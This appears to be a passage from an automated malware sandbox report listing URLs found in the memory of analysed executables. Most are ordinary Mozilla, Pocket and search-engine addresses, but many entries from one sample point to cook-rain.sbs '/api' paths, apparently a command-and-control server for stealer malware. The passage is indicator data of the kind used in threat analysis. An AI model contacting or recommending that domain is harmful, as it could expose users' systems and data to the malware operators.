                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2912910905.000000000530D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924556550.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924865239.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: firefox.exe, 0000002B.00000002.3215012114.0000023769158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                      Source: 8eeb449c35.exe, 00000021.00000003.3274935385.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
                      Source: 8eeb449c35.exe, 00000019.00000003.2940088973.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2909497390.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2968890217.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2945222453.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2970108810.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/3
                      Source: 8eeb449c35.exe, 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/6
                      Source: 8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/66
                      Source: 8eeb449c35.exe, 00000021.00000003.3277455938.00000000011D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/6gR
                      Source: 8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/9
                      Source: 8eeb449c35.exe, 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/B
                      Source: 8eeb449c35.exe, 00000019.00000003.2945410918.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2930247035.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2925112869.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2940572613.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2909638778.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2940356272.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2909582826.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/CoCcHg
                      Source: 8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/D
                      Source: 8eeb449c35.exe, 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/SSp
                      Source: 8eeb449c35.exe, 00000021.00000003.3223058134.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3274935385.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/UWy
                      Source: 8eeb449c35.exe, 00000019.00000003.2940088973.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2968890217.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2945222453.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2970108810.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2925047603.0000000000DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/W
                      Source: 8eeb449c35.exe, 00000019.00000003.2968890217.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2970108810.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Y
                      Source: 8eeb449c35.exe, 00000021.00000003.3274935385.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
                      Source: 8eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apigs
                      Source: 8eeb449c35.exe, 00000019.00000003.2925047603.0000000000DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apine
                      Source: 8eeb449c35.exe, 00000019.00000003.2945410918.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.3014142241.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2940572613.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.3014969263.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2940356272.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/nt
                      Source: 8eeb449c35.exe, 00000019.00000003.3014142241.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.3014969263.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.3142731853.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/pi
                      Source: 8eeb449c35.exe, 00000019.00000003.2968890217.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2970108810.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/r
                      Source: 8eeb449c35.exeString found in binary or memory: https://cook-rain.sbs:443/api
                      Source: 8eeb449c35.exe, 00000019.00000003.3014614816.000000000530E000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2911664877.000000000530F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apiLocal
                      Source: firefox.exe, 0000002B.00000002.3162168444.0000023758711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsLis
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                      Source: firefox.exe, 0000002B.00000002.3267798545.0000160E4E004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3012374390.0000023768732000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3012915910.0000023768753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3215012114.0000023769158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/y
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://ebay.com
                      Source: firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebay.comP
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sexperimental-features-devtools-serviceworker-debug
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmoz-e
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsor
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1resource://gre/modules/AddonManager.jsm
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1resource://gre/modules/AddonManager.jsmSending
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268410463.000023F90CF04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabX
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/common/Actions.sys.m
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://activity-stream/lib/PrefsFeed.jsm
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moresetupPrefs/hideDescriptionsRegions
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsTOP_SITES_CLOSE_SEARCH_SHORTCUTS_MODALTOP_SITES_OPEN_SEARCH_SHO
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
                      Source: firefox.exe, 0000002B.00000002.3227392661.0000023769AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                      Source: firefox.exe, 0000002B.00000002.3227392661.0000023769AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/issues/1266
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots_wrapOpenRequest/request.onupgradeneeded
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporter
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/validate/chromeModifiers
                      Source: firefox.exe, 0000002B.00000002.3162168444.0000023758711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
